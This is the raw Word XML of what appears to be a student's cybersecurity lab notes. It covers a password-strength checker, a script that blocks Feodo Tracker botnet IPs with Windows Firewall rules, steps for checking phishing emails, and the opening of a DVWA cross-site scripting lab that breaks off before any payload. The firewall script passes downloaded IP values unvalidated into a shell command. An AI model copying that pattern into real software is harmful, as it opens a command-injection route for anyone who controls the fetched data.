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49AB4" w14:textId="252FB0ED" w:rsidR="002C5E1E" w:rsidRPr="002C5E1E" w:rsidRDefault="002C5E1E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5E1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Password Strength Testing using Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB6DC7" w14:textId="38CCE547" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import re </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F5757" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def check_password_strength(password): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73767BBF" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if len(password) &lt; 8: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F1A79" w14:textId="61E7E974" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "Weak: Password must be at least 8 characters long." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43873C45" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if not any(char.isdigit() for char in password): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF452" w14:textId="4DB5CA6A" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "Weak: Password must include at least one number." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2AA8F" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if not any(char.isupper() for char in password): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FBC0B4" w14:textId="401926BA" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "Weak: Password must include at least one uppercase letter." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C99E7" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if not any(char.islower() for char in password): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32768578" w14:textId="0EC3BBFB" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "Weak: Password must include at least one lowercase letter." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB15CD" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if not re.search(r'[!@#$%^&amp;*(),.?":{}|&lt;&gt;]', password): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96D94C" w14:textId="4CDB9A32" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "Medium: Add special characters to make your password stronger." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA9466" w14:textId="56E0CB8D" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return "Strong: Your password is secure!" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C0889" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def password_checker(): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FEA094" w14:textId="02BC59D9" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Welcome to the Password Strength Checker!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63511D" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while True: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF51BF1" w14:textId="2F47F1A9" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        password = input("\nEnter your password (or type 'exit' to quit): ") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DF3B9" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if password.lower() == "exit": </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBCDC2" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print("Thank you for using the Password Strength Checker! Goodbye!") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525C63A" w14:textId="10238808" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25327C95" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        result = check_password_strength(password) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AC576" w14:textId="50EA72FD" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445FA16" w14:textId="77777777" w:rsidR="00713F6E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if __name__ == "__main__": </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26099147" w14:textId="7B97FCFF" w:rsidR="00DE339E" w:rsidRDefault="00713F6E" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password_checker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC3D7C" w14:textId="049EC9DC" w:rsidR="00DB5F7B" w:rsidRDefault="00000000" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="365F647C">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5C88A" w14:textId="461B4148" w:rsidR="00507497" w:rsidRPr="00507497" w:rsidRDefault="00507497" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Firewall Configuration: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F412A08" w14:textId="4C03F5B4" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F63711" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1AE8B" w14:textId="24B9A39B" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1BCFF" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Source: Abuse.ch Feodo Tracker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C6CD0" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>url = "https://feodotracker.abuse.ch/downloads/ipblocklist.csv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB66D4" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Download the CSV file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564A644" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>response = requests.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE8D72" w14:textId="07FDCCAC" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data = response.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275220A" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Delete existing firewall rule (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A78204" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>delete_rule = 'netsh advfirewall firewall delete rule name="BadIP"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEE30C" w14:textId="2EA1A6F8" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>subprocess.run(["PowerShell", "-Command", delete_rule], shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318F76F" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Read CSV and ignore comment lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD94061" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mycsv = csv.reader(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87A805" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    filter(lambda x: not x.startswith("#"), data.splitlines())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCA85D" w14:textId="0A8F52B0" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63B85F" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Loop through each row and block IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA50461" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for row in mycsv:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FBF64" w14:textId="17A6F055" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ip = row[1]  # IP address column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E4EF8" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Skip header row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D872A8" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ip != "dst_ip":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E1C72" w14:textId="327BB06B" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print("Added Rule to block:", ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4306182E" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        add_rule = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA8396" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "netsh advfirewall firewall add rule "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6FA64" w14:textId="77777777" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "name='BadIP' Dir=Out Action=Block RemoteIP=" + ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2537A2" w14:textId="52F33B0B" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02BB42" w14:textId="5E090D52" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        subprocess.run(["PowerShell", "-Command", add_rule], shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EDC60" w14:textId="3FD6C6E4" w:rsidR="00DB5F7B" w:rsidRDefault="00DB5F7B" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print("Finished blocking malicious IPs.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB878E0" w14:textId="77777777" w:rsidR="00805008" w:rsidRDefault="00805008" w:rsidP="00DB5F7B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B09EF1" w14:textId="31CBF760" w:rsidR="00805008" w:rsidRDefault="00805008" w:rsidP="00805008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:t>Press Win + R → type wf.msc → Press Enter.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>2. Click on "Inbound Rules".</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>3. Click "New Rule" (right side panel).</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>4. Select "Custom" → Click Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>5. Select "All Programs" → Click Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>6. Protocol and Ports → Keep default → Click Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>7. Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>- Under Remote IP Address → Select "These IP addresses".</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>- Click Add → Enter IP (Example: 1.2.3.4).</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>- Click OK → Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>8. Action → Select "Block the connection" → Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>9. Profile → Select Domain, Private, Public → Next.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>10. Name the rule (Example: Manual_Block_IP) → Finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E871E" w14:textId="40EB683D" w:rsidR="00805008" w:rsidRDefault="00805008" w:rsidP="00805008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00805008">
        <w:lastRenderedPageBreak/>
        <w:t>Install requests (if not installed):</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>python -m pip install requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDAFC4" w14:textId="7B0ED89F" w:rsidR="00805008" w:rsidRDefault="00805008" w:rsidP="00805008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00805008">
        <w:t>------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>EXECUTION STEPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>1. Open Command Prompt → Run as Administrator.</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>2. Navigate to file location:</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>cd Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>3. Check Python version:</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>python --version</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>4. Run the program:</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>python firewall.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3472A" w14:textId="4335507E" w:rsidR="00805008" w:rsidRDefault="00805008" w:rsidP="00805008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>VERIFY RULES</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>1. Open wf.msc</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>2. Click Outbound Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>3. Search for rule name: BadIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00805008">
        <w:br/>
        <w:t>You will see blocked IP addresses listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB963C3" w14:textId="2368BBEF" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00805008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="6234ECAE">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA42644" w14:textId="0F1ECB39" w:rsidR="00C2479E" w:rsidRPr="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2479E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Analyzing Phishing Emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA57004" w14:textId="5CEC843D" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>EMAIL ANALYSIS – 4 BASIC STEPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733385D8" w14:textId="789A0D32" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>1. Open the Online EML Analyzer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9652AD" w14:textId="1AB8AD89" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>2. Analyze the email details and header information</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC0255" w14:textId="19778F14" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>3. Note the sender IP address from the header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A07094" w14:textId="4C225A3C" w:rsidR="00C2479E" w:rsidRDefault="00C2479E" w:rsidP="00C2479E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>4. Check the sender IP in VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C5A11" w14:textId="12F9EECA" w:rsidR="00C2479E" w:rsidRDefault="00AF6694" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="38664CFF">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7ACC74" w14:textId="7402300A" w:rsidR="00AF6694" w:rsidRPr="00AF6694" w:rsidRDefault="00AF6694" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF6694">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Vulnerabilities using DVWA on Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FE229" w14:textId="7C375756" w:rsidR="00402DCF" w:rsidRDefault="00AF6694" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6694">
        <w:t>Start DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Open Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63356C1E" w14:textId="77777777" w:rsidR="00402DCF" w:rsidRDefault="00402DCF" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4365D9D4" w14:textId="4AB02983" w:rsidR="00826CB2" w:rsidRDefault="00402DCF" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
